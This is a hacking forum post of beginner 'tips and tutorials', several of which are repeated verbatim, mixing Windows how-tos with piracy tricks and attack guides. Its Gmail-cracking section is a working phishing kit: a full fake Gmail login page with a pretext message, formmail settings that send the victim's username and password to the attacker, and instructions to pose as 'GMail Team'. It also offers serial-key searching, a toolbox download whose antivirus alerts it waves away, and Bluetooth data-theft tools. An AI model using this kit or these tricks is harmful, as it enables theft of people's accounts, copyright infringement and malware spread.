SMALL TIPS AND TUTORIALS!!!(NOOB FRIENDLY)

Discussion about hacker.org's server
dextering12
Posts: 12
Joined: Sun Jun 14, 2009 9:36 am
Location: Philippines
Contact:

SMALL TIPS AND TUTORIALS!!!(NOOB FRIENDLY)

Post by dextering12 »

my AIO hackers tool box 199MB
part1
http://rapidshare.com/files/235990051/A ... .part1.rar
part2
http://rapidshare.com/files/235990052/A ... .part2.rar
part3
http://rapidshare.com/files/235931298/A ... ve.net.rar

ENJOY!


This Set contains almost the latest and news versions of every tool included. This is basicly almost everything you will need to unpack/pack/hex edit/make patch/disasemble... etc.

Some of the files can be seen as malware by some anitivirus but i asure you that every file is clean and the results you get are false/positive.

------------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------
** DEXTERING12 does not take any responsibility for your actions **

** DEXTERING12 takes no responsible for any damage caused by this tutorial ** //
------------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------
*1 How To Block Websties Without Software, block websites

*2 Keep Folders Hidden

*3 cd keys with google # CODE (94FBR)

*4 How To Convert File System, fat - fat32 to ntfs USING CMD

*5 FORMAT USING USB DRIVE

*6 AUTO FORMATTING a computer

*7 Fixing A Corrupt Files using a site?

*8 LOCK A FILE AND PROGRAMS USING CMD



ABOUT HACKING PASSWORDS AND VIRUS

*BLUETOOTH HACKING
*CRACKING G-MAIL ACCOUNT PASSWORD


How To Block Websties Without Software, block websites
Steps:
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!
-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<--


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

etc

Keep Folders Hidden

first create a new folder somewhere on your hard drive
when you name it hold down "Alt" and press "0160" this will create and invisible space so it will apper as if it has no name.
then right click in and select "Properties" select the tab "coustimize" and select "change icon" scroll along and you should a few blanc spaces click on any one and click ok when you hav saved the settings the folder will be invisible to hide all your personal files

Tip
Other Secret Code to a Hidden Name
Now hold the "Alt" key and type "255" and hit Enter


ok, this is a little trick that i usually use to find cd keys with google # CODE (94FBR)


if your looking for a serial number for nero (for example) goto google.com and type nero 94FBR and it'll bring it up

this works great in google

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.

2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.


I hope this trick help you finding your ccd keys easily

Enjoy


How To Convert File System, fat - fat32 to ntfs USING CMD

open a dos prompt and give the command

convert d: /fs:ntfs

this command would convert your d: drive to ntfs.

if the system cannot lock the drive, you will be prompted to convert it during next reboot.

Normally you should select yes.

Conversion from fat/fat32 to ntfs is non-destructive, your data on the drive will NOT be lost.

Be aware that converting to ntfs will make that partition of your
drive unreadable under dos unless you have ntfs utilites to do so.

FORMAT USING USB DRIVE..!!!

Requirements:
*USB Flash Drive (Minimum 4GB)
*Windows 7 or Vista installation files.
Follow the below steps to create bootable Windows 7/Vista USB drive using which you can install Windows 7/Vista easily.
1. Plug-in your USB flash drive to USB port and move all the contents from USB drive to a safe location on your system.
2. Open Command Prompt with admin rights. Use any of the below methods to open Command Prompt with admin rights.
*Type cmd in Start menu search box and hit Ctrl+ Shift+ Enter.
Or
*Go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as administrator.
3. You need to know about the USB drive a little bit. Type in the following commands in the command prompt:
First type DISKPART and hit enter
Next type LIST DISK command and note down the Disk number (ex: Disk 1) of your USB flash drive.
4. Next type all the below commands one by one. Here I assume that your disk drive no is “Disk 1”.If you have Disk 2 as your USB flash drive then use Disk 2.Refer the above step to confirm it.
So below are the commands you need to type and execute one by one:
SELECT DISK 1
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN
EXIT
Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.

5. Next insert your Windows7/Vista DVD into the optical drive and check the drive letter of the DVD drive. In this guide I will assume that your DVD drive letter is “D” and USB drive letter is “H” (open my computer to know about it).

6. Maximize the minimized Command Prompt in the 4th step.Type the following command now:
D:CD BOOT and hit enter.Where “D” is your DVD drive letter.
CD BOOT and hit enter to see the below message.

7. Type another command given below to update the USB drive with BOOTMGR compatible code.
BOOTSECT.EXE/NT60 H:

Where “H” is your USB drive letter. Once you enter the above command you will see the below message.

8. Copy your Windows 7/Vista DVD contents to the USB flash drive.

9. Your USB drive is ready to boot and install Windows 7/Vista. Only thing you need to change the boot priority at the BIOS to USB from the HDD or CD ROM drive. I won’t explain it as it’s just the matter the changing the boot priority or enabling the USB boot option in the BIOS.
Note: If you are not able to boot after following this guide means you haven’t set the BIOS priority to USB.


AUTO FORMATTINGunattended.msfn

Have you ever wanted a windows CD that would install Windows by automatically putting in your name, product key, timezone and regional settings? And have it merged with the latest Service Pack to save time? Followed by silently installing all your favorite applications along with DirectX 9.0c, .Net Framework 1.1 and then all the required hotfixes, updated drivers, tweaks, and a readily patched UXTheme without any user interaction whatsoever? Then this guide will show you how you can do just that!

TIP
DOWNLOAD a OS with a UNATTENDED name

EX..Windows XP SP3 Pro. Corp. USB INSTALLABLE! Semi-Unattended

FOR MORE INFO!

(unattended.msfn)search this through google..


Fixing A Corrupt Files

I hope this hasn't been submitted before, but i did a search and didn't find anything so here goes.
Have you ever downloaded a game/app/movie/... and when it was finished, you find out that are some missing files or corrupt ones?
Well here's a way to find those files:
--> www.incomplete.me.uk

LOCK A FILE AND PROGRAMS USING CMD
copy the code INTO YOUR NOTEPAD
SAVE it AS (YOURLOCKERNAME.BAT)



cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
echo Folder created
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter Password to Unlock Dexter's Folder
set/p "pass=>"
if NOT %pass%== YOUR PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Dexter's Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

-: Computer Viruses :-


What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user. Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.


-: Password Hacking :-


Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information. Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....
In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Check Your Password Strength


3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.
4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.
5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.
It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.


-: Cracking GMail Account Password :-


Here is the most effective technique for cracking GMail Accounts Passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :- 90%

Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below-


The HTML code for above login screen created by me is given below-

<html lang="en" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type=text/css> <!-- body,td,div,p,a,font,span {font-family: arial,sans-serif} body {margin-top:2} .c {width: 4; height: 4} .bubble {background-color:#C3D9FF} .tl {padding: 0; width: 4; text-align: left; vertical-align: top} .tr {padding: 0; width: 4; text-align: right; vertical-align: top} .bl {padding: 0; width: 4; text-align: left; vertical-align: bottom} .br {padding: 0; width: 4; text-align: right; vertical-align: bottom} .caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center} .form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid} .feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; } .feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; } // --> </style> <title> Gmail: Email from Google </title> </noscript> </head> <body bgcolor=#ffffff link=#0000FF vlink=#0000FF onload="OnLoad()"> <table width=95% border=0 align=center cellpadding=0 cellspacing=0> <tr valign=top> <td width=1%> <img src="https://mail.google.com/mail/help/images/logo.gif" border=0 width=143 height=59 alt="Gmail" align=left vspace=10/> </noscript> </td> <td width=99% bgcolor=#ffffff valign=top> <table width=100% cellpadding=1> <tr valign=bottom> <td><div align=right> </div></td> </tr> <tr> <td nowrap=nowrap> <table width=100% align=center cellpadding=0 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5> <tr> <td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td> <script>utmx_section("title")</script> <td class=bubble rowspan=2 style="font-family:arial;text-align:left;font-weight:bold;padding:5 0"><b>Welcome to Gmail</b></td> <td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td> </noscript> </tr> <tr> <td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td> <td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> </table> <table width=94% align=center cellpadding=5 cellspacing=1> <tr> <td valign=top style="text-align:left"><b>A Google approach to email.</b> <td valign=top> </tr> <tr> <td width=75% valign=top> <p style="margin-bottom: 0;text-align:left"><font size=-1> Dear <b><victim name></b>, <br><br> <table align="center" width="75%"> <tr><td><font size="-1"> We are moving database partly to our new server.<br> This require your account verification for proper redirection...!<br> Please verify yourself by entering correct google account 'username' and 'password'. Click 'Move'.<br> Repply this message within 72 hours.<br> Thank You ! for your Co-Operation........! </font><br><br> <b>GMail Team</b> </td></tr></table> </font> </p> </noscript> </noscript> </td> <td valign=top> <div id=login> <form id="gaia_loginform" action="login.asp" method="post"> <div id="gaia_loginbox"> <table class="form-noindent" cellspacing="3" cellpadding="5" width="100%" border="0"> <tr> <td valign="top" style="text-align:center" nowrap="nowrap" bgcolor="#e8eefa"> <div class="loginBox"> <table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0"> <tr> <td colspan="2" align="center"> <table> <tr> <td valign="top"><font color="#0000FF">G</font><font color="#FF0000">o</font><font color="#FFCC33">o</font><font color="#0000FF">g</font><font color="#009900">l</font><font color="#FF0000">e</font></td> <td valign="middle"> <font size="+0"><b>Account</b></font> </td> </tr> </table></td> </tr> <script type="text/javascript"><!-- function onPreCreateAccount() { return true; } function onPreLogin() { if (window["onlogin"] != null) { return onlogin(); } else { return true; } } --></script> <tr> <td colspan="2" align="center"> </td> </tr> <tr> <td nowrap="nowrap"> <div align="right"> <span class="gaia le lbl"> Username: </span> </div></td> <td> <input type="text" name="Email" id="Email" size="18" value="" class='gaia le val' /> </td> </tr> <tr> <td></td> <td align="left"> </td> </tr> <tr> <td align="right"> <span class="gaia le lbl"> Password: </span> </td> <td> <input type="password" name="Passwd" id="Passwd" size="18" class="gaia le val" /> </td> </tr> <tr> <td> </td> <td align="left"> </td> </tr> <tr> <td> </td> <td align="left"> <input type="submit" class="gaia le button" name="signIn" value="Move" /> </td> </tr> </table> </div> </td> </tr> </table> </div> </form> </div> <br> <table class=form-noindent cellpadding=0 width=100% bgcolor=#E8EEFA id=links> <tr bgcolor=#E8EEFA> <td valign=top align="center"><font size=+0><br> <font size="-1"> <a href="http://mail.google.com/mail/help/intl/e ... tml">About Gmail</a > <a href="http://mail.google.com/mail/help/intl/e ... .html">New features!</a> </font> </font></td> </table> </noscript> </table> <br> <table width=95% align=center cellpadding=3 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5> <tr> <td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td> <td class=bubble rowspan=2 style=text-align:left> <div align=center> <font size=-1 color=#666666>©2008 Google - <a href="http://www.google.com/a/help/intl/en/us ... oter">Gmai l for Organizations</a> - <a href="http://gmailblog.blogspot.com/?utm_sour ... ftr">Gmail Blog</a> - <a href="http://mail.google.com/mail/help/intl/e ... ">Terms</a> - <a href="http://mail.google.com/support/">Help</a> </font> </div> </td> <td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td> </tr> <tr> <td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td> <td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td> </tr> </table> </body> </html>

Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-

1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-

Your form must start with the following <form> HTML tag:<br> <form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192"> You must also include the following hidden configuration fields in your form so that formmail.com knows what account and form processor to use on the submitted data: <input type="hidden" name="_pid" value="94566"> <input type="hidden" name="_fid" value="36THG54Z"> You must also inform this form processor who you wish to have your form results emailed to. To do so, you must include a hidden form field that specifies the recipient: <input type="hidden" name="recipient" value="your email address"> Please Note: the above field will work, but an even better solution is to use the ID number for that email address (thus hiding your address from spammers): <input type="hidden" name="recipient" value="1">

OR

2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.

Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.

As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!

Done.......?

-: BlueTooth Hacking :-


Discovering Bluetooth Devices :-
Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within the range.

Recommended Tools
BlueScanner
It will try to extract as much information as possible for each newly discovered device
Download
BlueSniff
It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices
Download
BTBrowser
It is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth enabled devices. It works on phones that supports JSR-82 - the Java Bluetooth specification
Download
BTCrawler
It is a scanner for Windows Mobile based devices. It also implements the BlueJacking and BlueSnarfing attacks
-----

Hacking Bluetooth Devices :-
There are a variety of different types of bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users. Following are some of the most common types of threats :-

1) BluePrinting Attack :- Information gathering is the first step in the quest to break into target system. Even BlueTooth devices can be fingerprinted or probed for information gathering using the technique known as BluePrinting. Using this one can determine manufacturer, model, version, etc. for target bluetooth enabled device.


Recommended Tools
BluePrint
As the name suggests
Download
BTScanner
It is an information gathering tool that allows attacker to query devices without the need to carry out pairing
Download

2) BlueJack Attack :- Bluejacking is the process of sending an anonymous message from a bluetooth enabled phone to another, within a particular range without knowing the exact source of the recieved message to the recepient.

Recommended Tools
FreeJack
Bluejacking tool written in JAVA
-----
CIHWB
Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Supports BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack
Download

3) BlueSnarf Attack :- Bluesnarfing is the process of connecting vulnerable mobile phones through bluetooth, without knowing the victim. It involves OBEX protocol by which an attacker can forcibly push/pull sensitive data in/out of the victim's mobile phone, hence also known as OBEX pull attack.
This attack requires J2ME enabled mobile phones as the attacker tool. With J2ME enabled phone, just by using bluesnarfing tools like Blooover, Redsnarf, Bluesnarf, etc. an attacker can break into target mobile phone for stealing sensitive data such as address book, photos, mp3, videos, SMS, ......!

Recommended Tools
Blooover
It is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. It can also be used to carry out BlueBug attack
Download
RedSnarf
One of the best bluesnarfing tool
-----
BlueSnarfer
It downloads the phone-book of any mobile device vulnerable to Bluesnarfing
Download





-:ABOUT Network Hacking :-


Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com

example:- c:/>ping www.google.com


Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.


Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n



Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21


Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert www.insecure.in



Here "* * * Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.

------------------------------------------------------------------------------------------------------------------
PART 2 Tutorials


Tutorial: Step by Step, How to Double Internet Explorer Speed
By default, IE allows only two simultaneous download sessions from a single Web server. This can affect the speed of your Web browsing, because you’re not able to simultaneously download all the objects that make up a Web page, so the page displays more slowly. If you could force IE to download more objects at once, Web pages would display more quickly.
A tweak to the Windows Registry does the trick. With this tweak, you can force IE to use more than two simultaneous sessions. A good number is 10. Here’s how to do it:

1. Run the Registry Editor by typing regedit at a command line or in the Windows Vista/XP Start Search box.



2. Go to

Code:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings.



3. Choose Edit –> New –> DWORD Value.



4. Create a new DWORD value called MaxConnectionsPer1_0Server



5. Double Click on it and Give it a value of 10.



6. Choose Edit –> New –> DWORD Value,



7. Create another DWORD value called MaxConnectionsPerServer



8. Double Click on it and Give it a value of 10



9. Exit the Registry and close IE. When you restart IE, the new value will be in effect and your Web browsing should speed up


Note
If you want to experiment with fewer or more than 10 simultaneous connections, change the value in both DWORD values accordingly.
------------------------------------------------------------------------------------------------------------------

How to BYPASS RAPIDSHARE WAITING TIMES!!

Well i know everyone here HATES to wait for the code box on rapidshare. Well i have done some reasearching and have found this may have been posted, or may not.. anyway here it is

have fun waiting in this instant world

might only work with firefox? keep it low :P


Bypass Rapid share's waiting time:
1. Goto the page you want to download
2. Select FREE button
You will now notice a timer that will say how long you have before you can get the RS code to enter. THIS IS WHEN YOU PUT THE BELOW IN THE ADDRESS BAR
3. In the address bar put the following: javascript:alert(c=0)
4. Press enter...(as in u want to go to a site)
5. Now it should show the code
6. Enter the captcha
7. Download Your File


Thanks slogd3ad for this. If the above aint clear enough then try this one

[ Here's how to ]
Goto where you want to d/l.
Click [FREE USER].
You'll send to queue and you'll see a coundown timer to start your download.
Goto your address bar and change to javascript:alert(c=0) .
A sudden pop-up will show and it only write 0 with a OK button.
Done!
Your waiting time was 40+sec turn to 0sec.
Now you're ready to download.
- END OF TUT. -
-----------------------------------------------------------------------------------------------------------------

*1 How To Block Websties Without Software, block websites

*2 Keep Folders Hidden

*3 cd keys with google # CODE (94FBR)

*4 How To Convert File System, fat - fat32 to ntfs USING CMD

*5 FORMAT USING USB DRIVE

*6 AUTO FORMATTING a computer

*7 Fixing A Corrupt Files using a site?

*8 LOCK A FILE AND PROGRAMS USING CMD

OTHER
MY SOURCE:


ABOUT HACKING PASSWORDS AND VIRUS

*BLUETOOTH HACKING
*CRACKING G-MAIL ACCOUNT PASSWORD


How To Block Websties Without Software, block websites
Steps:
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!
-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<--


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

etc

Keep Folders Hidden

first create a new folder somewhere on your hard drive
when you name it hold down "Alt" and press "0160" this will create and invisible space so it will apper as if it has no name.
then right click in and select "Properties" select the tab "coustimize" and select "change icon" scroll along and you should a few blanc spaces click on any one and click ok when you hav saved the settings the folder will be invisible to hide all your personal files

Tip
Other Secret Code to a Hidden Name
Now hold the "Alt" key and type "255" and hit Enter


ok, this is a little trick that i usually use to find cd keys with google # CODE (94FBR)


if your looking for a serial number for nero (for example) goto google.com and type nero 94FBR and it'll bring it up

this works great in google

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.

2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.


I hope this trick help you finding your ccd keys easily

Enjoy


How To Convert File System, fat - fat32 to ntfs USING CMD

open a dos prompt and give the command

convert d: /fs:ntfs

this command would convert your d: drive to ntfs.

if the system cannot lock the drive, you will be prompted to convert it during next reboot.

Normally you should select yes.

Conversion from fat/fat32 to ntfs is non-destructive, your data on the drive will NOT be lost.

Be aware that converting to ntfs will make that partition of your
drive unreadable under dos unless you have ntfs utilites to do so.

FORMAT USING USB DRIVE..!!!

Requirements:
*USB Flash Drive (Minimum 4GB)
*Windows 7 or Vista installation files.
Follow the below steps to create bootable Windows 7/Vista USB drive using which you can install Windows 7/Vista easily.
1. Plug-in your USB flash drive to USB port and move all the contents from USB drive to a safe location on your system.
2. Open Command Prompt with admin rights. Use any of the below methods to open Command Prompt with admin rights.
*Type cmd in Start menu search box and hit Ctrl+ Shift+ Enter.
Or
*Go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as administrator.
3. You need to know about the USB drive a little bit. Type in the following commands in the command prompt:
First type DISKPART and hit enter
Next type LIST DISK command and note down the Disk number (ex: Disk 1) of your USB flash drive.
4. Next type all the below commands one by one. Here I assume that your disk drive no is “Disk 1”.If you have Disk 2 as your USB flash drive then use Disk 2.Refer the above step to confirm it.
So below are the commands you need to type and execute one by one:
SELECT DISK 1
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN
EXIT
Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.

5. Next insert your Windows7/Vista DVD into the optical drive and check the drive letter of the DVD drive. In this guide I will assume that your DVD drive letter is “D” and USB drive letter is “H” (open my computer to know about it).

6. Maximize the minimized Command Prompt in the 4th step.Type the following command now:
D:CD BOOT and hit enter.Where “D” is your DVD drive letter.
CD BOOT and hit enter to see the below message.

7. Type another command given below to update the USB drive with BOOTMGR compatible code.
BOOTSECT.EXE/NT60 H:

Where “H” is your USB drive letter. Once you enter the above command you will see the below message.

8. Copy your Windows 7/Vista DVD contents to the USB flash drive.

9. Your USB drive is ready to boot and install Windows 7/Vista. Only thing you need to change the boot priority at the BIOS to USB from the HDD or CD ROM drive. I won’t explain it as it’s just the matter the changing the boot priority or enabling the USB boot option in the BIOS.
Note: If you are not able to boot after following this guide means you haven’t set the BIOS priority to USB.


AUTO FORMATTINGunattended.msfn

Have you ever wanted a windows CD that would install Windows by automatically putting in your name, product key, timezone and regional settings? And have it merged with the latest Service Pack to save time? Followed by silently installing all your favorite applications along with DirectX 9.0c, .Net Framework 1.1 and then all the required hotfixes, updated drivers, tweaks, and a readily patched UXTheme without any user interaction whatsoever? Then this guide will show you how you can do just that!

TIP
DOWNLOAD a OS with a UNATTENDED name

EX..Windows XP SP3 Pro. Corp. USB INSTALLABLE! Semi-Unattended

FOR MORE INFO!

(unattended.msfn)search this through google..


Fixing A Corrupt Files

I hope this hasn't been submitted before, but i did a search and didn't find anything so here goes.
Have you ever downloaded a game/app/movie/... and when it was finished, you find out that are some missing files or corrupt ones?
Well here's a way to find those files:
